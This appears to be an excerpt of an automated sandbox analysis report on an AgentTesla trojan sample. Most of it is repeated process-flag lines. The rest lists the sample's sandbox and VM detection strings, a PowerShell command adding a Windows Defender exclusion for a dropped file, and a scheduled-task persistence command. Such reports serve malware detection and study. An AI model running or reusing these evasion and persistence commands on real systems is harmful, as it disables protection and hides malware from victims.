                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.28929b0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 6704, type: MEMORYSTR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe TID: 6708Thread sleep time: -45733s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe TID: 3416Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe TID: 3420Thread sleep count: 4097 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe TID: 3420Thread sleep count: 4475 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7114
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1621
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWindow / User API: threadDelayed 4097
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWindow / User API: threadDelayed 4475
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeThread delayed: delay time: 45733
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeThread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.590508401.000000000136D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe VolumeInformation
